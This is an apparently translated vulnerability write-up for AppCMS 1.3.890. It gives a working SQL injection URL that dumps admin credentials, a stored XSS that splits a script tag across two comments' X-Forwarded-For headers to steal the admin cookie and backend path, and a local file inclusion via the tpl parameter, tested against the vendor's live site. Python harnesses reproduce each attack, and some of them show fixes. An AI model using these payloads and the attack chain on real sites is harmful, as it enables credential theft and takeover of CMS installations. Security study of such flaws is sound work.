AppCMS SQL injection and comment XSS vulnerabilities

Source: Internet
Author: User

0x02 SQL Injection principles

Download the latest version, appcms_1.3.890.
Look at index.php. There is a check that appears to restrict the search term:

    if (!preg_match("/^[\x{4e00}-\x{9fa5}\w{0}]+$/u", $_GET['q'])) {
        die('Only underscores, digits, letters, Chinese characters and spaces are allowed in the search term. Please enter it again. Click here <a href="' . SITE_PATH . '">to return to the homepage</a>');
    }
So a search from the homepage for a keyword containing ' is rejected with the message above.

But looking further up in index.php, there is a block that handles the Ajax keyword-suggestion request, and at that point q has not been filtered at all. That is where the injection comes from:

    // Ajax request: keyword suggestions
    if (trim($_GET['q']) != '' && !isset($_GET['tpl'])) {
        $str = '';
        $sql = "SELECT app_id, app_title, app_down FROM " . TB_PREFIX . "app_list WHERE app_title LIKE '%" . trim($_GET['q']) . "%' limit 15";
        $app_list = $dbm->query($sql);
        if (count($app_list['LIST']) > 0) {
            foreach ($app_list['LIST'] as $k => $v) {
                $app_list['LIST'][$k]['app_title'] = helper::utf8_substr($v['app_title'], 0, 20);
            }
            echo json_encode($app_list['LIST']);
            exit;
        } else {
            exit;
        }
    }


This branch is entered when $_GET['q'] is non-empty and $_GET['tpl'] is not set. A normal search submits ?tpl=search&q='sd, so tpl is present and the branch is skipped; drop tpl from the request and it is entered.
Inside it, trim($_GET['q']) is concatenated straight into the SELECT statement, which is the injection.
Exploit:

index.php?q=xxoo'union select 1,uname,upass from appcms_admin_list where uid like '
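As an added illustration (not code from this post or from AppCMS), the following Python mirrors the two request paths in index.php against an in-memory SQLite copy of the two tables the payload touches. The table prefix appcms_, the column types and the admin row are constructed sample data; the search regex and the string-built query are transcribed from the PHP above. The payload from the post is run through the Ajax branch, and a bound-parameter variant shows the fix.

```python
import re
import sqlite3

# PHP: preg_match("/^[\x{4e00}-\x{9fa5}\w{0}]+$/u", $_GET['q'])
# Inside a character class "{0}" is just the literal characters "{", "0" and "}".
SEARCH_TERM_RE = re.compile(r"^[\u4e00-\u9fa5\w{0}]+$")

TB_PREFIX = "appcms_"  # assumed prefix; the payload on the page targets appcms_admin_list


def build_demo_db():
    """Constructed schema and rows standing in for the two tables the payload touches."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(f"""
        CREATE TABLE {TB_PREFIX}app_list (app_id INTEGER, app_title TEXT, app_down TEXT);
        INSERT INTO {TB_PREFIX}app_list VALUES (1, 'Notepad', '/down/1'), (2, 'Calculator', '/down/2');
        CREATE TABLE {TB_PREFIX}admin_list (uid INTEGER, uname TEXT, upass TEXT);
        INSERT INTO {TB_PREFIX}admin_list VALUES (1, 'admin', '21232f297a57a5a743894a0e4a801fc3');
    """)
    return conn


def search_term_allowed(params):
    """Mirror of the filtered path (?tpl=search&q=...): the regex rejects a quote."""
    return bool(SEARCH_TERM_RE.match(params.get("q", "")))


def ajax_suggest(conn, params):
    """Mirror of the Ajax branch: entered when q is non-empty and tpl is absent.
    The query is built by string concatenation exactly as the CMS does it."""
    q = params.get("q", "").strip()
    if q == "" or "tpl" in params:
        return None
    sql = (f"SELECT app_id, app_title, app_down FROM {TB_PREFIX}app_list "
           f"WHERE app_title LIKE '%{q}%' limit 15")
    return conn.execute(sql).fetchall()


def ajax_suggest_fixed(conn, params):
    """Hardened variant: the search term is bound, so a quote is data, not SQL."""
    q = params.get("q", "").strip()
    if q == "" or "tpl" in params:
        return None
    sql = (f"SELECT app_id, app_title, app_down FROM {TB_PREFIX}app_list "
           f"WHERE app_title LIKE ? limit 15")
    return conn.execute(sql, (f"%{q}%",)).fetchall()


PAYLOAD = "xxoo'union select 1,uname,upass from appcms_admin_list where uid like '"

if __name__ == "__main__":
    db = build_demo_db()
    print("filtered path accepts 'sd:", search_term_allowed({"tpl": "search", "q": "'sd"}))
    print("ajax branch, injected:", ajax_suggest(db, {"q": PAYLOAD}))
    print("ajax branch, bound param:", ajax_suggest_fixed(db, {"q": PAYLOAD}))
```

The closing quote at the end of the payload is what makes the query parse: it pairs with the `%'` that the CMS appends, leaving `where uid like '%' limit 15`, and the three selected columns line up with app_id, app_title, app_down so the admin credentials come back in the JSON the suggestion box normally receives.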


Having the administrator's password is not enough on its own, though, because the CMS forces the user to change the backend (admin panel) path. So we need a way to learn the backend path, and that is where the following XSS comes in.


0x03 XSS principle

comment.php obtains the client IP address with the helper below and stores it in the database:

    /**
     * Obtain the client IP address.
     */
    public static function getip() {
        $onlineip = '';
        if (getenv('HTTP_CLIENT_IP') && strcasecmp(getenv('HTTP_CLIENT_IP'), 'unknown')) {
            $onlineip = getenv('HTTP_CLIENT_IP');
        } elseif (getenv('HTTP_X_FORWARDED_FOR') && strcasecmp(getenv('HTTP_X_FORWARDED_FOR'), 'unknown')) {
            $onlineip = getenv('HTTP_X_FORWARDED_FOR');
        } elseif (getenv('REMOTE_ADDR') && strcasecmp(getenv('REMOTE_ADDR'), 'unknown')) {
            $onlineip = getenv('REMOTE_ADDR');
        } elseif (isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], 'unknown')) {
            $onlineip = $_SERVER['REMOTE_ADDR'];
        }
        return $onlineip;
    }



When HTTP_X_FORWARDED_FOR is present (and HTTP_CLIENT_IP is not), its value is taken as the client IP. That header is entirely under the client's control, so HTML and script can be injected through it; the value is stored and later shown to the administrator, which gives a stored XSS.
However, the ip column in the database is limited to 20 characters, so fitting a payload in is the challenge.

So we build it from two comments.

First, post a comment whose body is the JavaScript we want to run; here it is a simple pop-up.

While submitting it, intercept the request and set X-Forwarded-For to the closing half of the script tag.

Then refresh the page and post a second comment. Its content does not matter; intercept it again and this time set X-Forwarded-For to the opening half of the script tag.

With that the job is done; all that is left is to wait for the cookie and the backend address to arrive.

When the administrator opens the comment list in the backend, the pop-up appears.

Look at the rendered page source.

Do you see it? The two values injected into the ip field open and close the script tag, and the page markup that falls between them is commented out with JavaScript comment delimiters. The body of the first comment is our JavaScript, wrapped in comment delimiters on both sides so that it sits in the gap between the commented-out markup.

So with two comments we have built an XSS that bypasses the 20-character limit on the field.
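The assembly can be checked offline. This is an added example, not the post's payload (its screenshots are not reproduced) and not AppCMS code: the row template, the newest-first ordering and the exact strings placed in the ip and content fields are assumptions, chosen so that both ip values stay within the 20-character column. It renders the two records the way an unescaped admin comment list would, extracts what the browser would hand to the JavaScript engine, and shows that escaping at output time prevents the split tag from forming.

```python
import html
import re

IP_FIELD_MAX = 20  # the column limit described in the post

# Assumed admin-page row layout (the post does not show the template): comment body, then IP.
ROW_TEMPLATE = "<tr><td>{content}</td><td>{ip}</td></tr>"


def check_ip_fits(ip):
    """Refuse any fragment the 20-character ip column would truncate."""
    if len(ip) > IP_FIELD_MAX:
        raise ValueError(f"{ip!r} is {len(ip)} chars, over the {IP_FIELD_MAX}-char ip column")
    return ip


# Two constructed comment records, in the order they were posted.
# First post: the JavaScript in the body, closing half of the script in the ip field.
# Second post: opening half of the script in the ip field; the body is irrelevant.
COMMENTS = [
    {"content": "*/alert(document.cookie+location.href)/*", "ip": check_ip_fits("*/</script>")},
    {"content": "hello", "ip": check_ip_fits("<script>/*")},
]


def render_admin_page(comments, escape=False):
    """Render the list newest-first, as an admin comment view typically does (assumed ordering).
    With escape=True the fields go through html.escape, the equivalent of htmlspecialchars()."""
    rows = []
    for c in reversed(comments):
        content, ip = c["content"], c["ip"]
        if escape:
            content, ip = html.escape(content), html.escape(ip)
        rows.append(ROW_TEMPLATE.format(content=content, ip=ip))
    return "<table>" + "".join(rows) + "</table>"


def executed_script(page_html):
    """What reaches the JS engine: the first <script> body with /* ... */ comments removed."""
    m = re.search(r"<script>(.*?)</script>", page_html, re.S)
    if not m:
        return None
    return re.sub(r"/\*.*?\*/", "", m.group(1), flags=re.S).strip()


if __name__ == "__main__":
    page = render_admin_page(COMMENTS)
    print(page)
    print("executes:", executed_script(page))
    print("executes with escaping:", executed_script(render_admin_page(COMMENTS, escape=True)))
```

Read the rendered string from left to right: the newer comment's ip field opens the script and a block comment, everything up to the older comment's body (including the table cells in between) is swallowed by that comment, the body closes it, runs, and opens another, and the older comment's ip field closes that comment and the script tag. Neither ip fragment exceeds 20 characters.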


0x04 LFI
Besides the two vulnerabilities above, there is also a local file inclusion in index.php, but getting beyond .php files with it needs truncation:

    if (substr($tpl, strlen($tpl) - 4, 4) == '.php') {
        $tmp_file = '/templates/' . $from_mobile . '/' . $tpl;
    } else {
        $tmp_file = '/templates/' . $from_mobile . '/' . $tpl . '.php';
    }
    if (!file_exists(dirname(__FILE__) . $tmp_file)) die('template page does not exist' . $tmp_file);
    require(dirname(__FILE__) . $tmp_file);


If $tpl does not already end in .php the suffix is appended; the file is then checked for existence and included. There is no filtering, and $tpl comes straight from $_GET['tpl'].
Test against the official site:

The database configuration file is included successfully; the error shown is because that file had already been included once.
I also tried truncating the path to include log files or other files (unfortunately the front end has no upload), but for reasons I could not work out it did not succeed. If you have a good idea, let me know.
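To make the constraint concrete, here is an added example (not the post's test and not AppCMS code) that mirrors the path construction above against a constructed directory tree. The directory names templates/pc and config/config.php are assumptions standing in for the real layout. It shows that a traversal to any existing .php file works as-is, that a non-.php target gets .php appended and so is never found without truncation, and how resolving the candidate path and checking it stays under the template directory closes the hole.

```python
import os
import tempfile


def resolve_template(base_dir, from_mobile, tpl):
    """Mirror of the index.php logic: append .php unless tpl already ends in it,
    then check existence. Returns the path that would be require()d, or None."""
    if tpl[-4:] == ".php":
        tmp_file = "/templates/" + from_mobile + "/" + tpl
    else:
        tmp_file = "/templates/" + from_mobile + "/" + tpl + ".php"
    path = base_dir + tmp_file
    if not os.path.exists(path):
        return None  # "template page does not exist"
    return os.path.normpath(path)


def resolve_template_safe(base_dir, from_mobile, tpl):
    """Hardened variant: resolve the candidate and refuse anything that escapes
    templates/<skin>/ after symlinks and '..' have been applied."""
    tpl_dir = os.path.realpath(os.path.join(base_dir, "templates", from_mobile))
    if not tpl.endswith(".php"):
        tpl += ".php"
    candidate = os.path.realpath(os.path.join(tpl_dir, tpl))
    if os.path.commonpath([tpl_dir, candidate]) != tpl_dir:
        return None  # traversal outside the template directory
    return candidate if os.path.isfile(candidate) else None


def make_demo_tree():
    """Constructed stand-in for the CMS install: one template and one config file."""
    root = tempfile.mkdtemp()
    os.makedirs(os.path.join(root, "templates", "pc"))
    os.makedirs(os.path.join(root, "config"))
    open(os.path.join(root, "templates", "pc", "index.php"), "w").close()
    open(os.path.join(root, "config", "config.php"), "w").close()  # assumed file name
    return root


if __name__ == "__main__":
    root = make_demo_tree()
    for tpl in ("index", "../../config/config", "../../../../etc/passwd"):
        print(f"{tpl!r:32} vulnerable -> {resolve_template(root, 'pc', tpl)}")
        print(f"{'':32} safe       -> {resolve_template_safe(root, 'pc', tpl)}")
```

The third probe is the one the post could not get to work: `../../../../etc/passwd` becomes `/etc/passwd.php`, which does not exist, so file_exists() fails before require() is ever reached. Only a null-byte or path-length truncation of the appended suffix (PHP versions that still allowed it) would turn this into an arbitrary-file include; against .php targets such as the configuration file no truncation is needed.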
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
That is the end of this gift package. I hope you learn something from it rather than just use it to collect a pile of servers.
